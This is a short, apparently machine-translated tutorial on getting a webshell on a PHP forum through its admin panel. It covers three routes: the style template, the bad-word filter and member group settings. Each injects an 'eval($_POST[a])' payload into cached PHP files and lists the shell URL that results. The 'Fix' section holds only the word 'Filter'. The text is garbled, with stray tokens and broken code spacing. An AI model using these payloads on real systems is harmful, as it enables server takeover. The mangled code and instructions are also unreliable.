Method 1 Template Method
Enter the background, set the style template, and write code in any line. Remember, this code must be written in the left line, and there cannot be any character in front of the Code.
EOT;
Eval ($ );
P9xiaont <EOT
Then we get a shell: http: // website/bbs/index. php.
Method for filtering the first two swear words
Go to security management ◇ bad word filtering. Add a bad word to write a] = aa; eval ($ _ POST [a]); //
Replace it with a shell address that can be written at will, and then get a shell address that is http: // website/bbs/data/bbscache/wordsfb. php.
Method 3 user level management
Create a new member group. You can write the title at will, but do not write special symbols for single double quotes. Upgrade the image number to a; eval ($ _ POST [a]); //, upgrade points can still be written at will. Then we get a shell address: http: // website/bbs/data/bbscache/level. php.
In the preceding three methods, the webshellr password is a, which is a backdoor server of lanker.
Fix:
Filter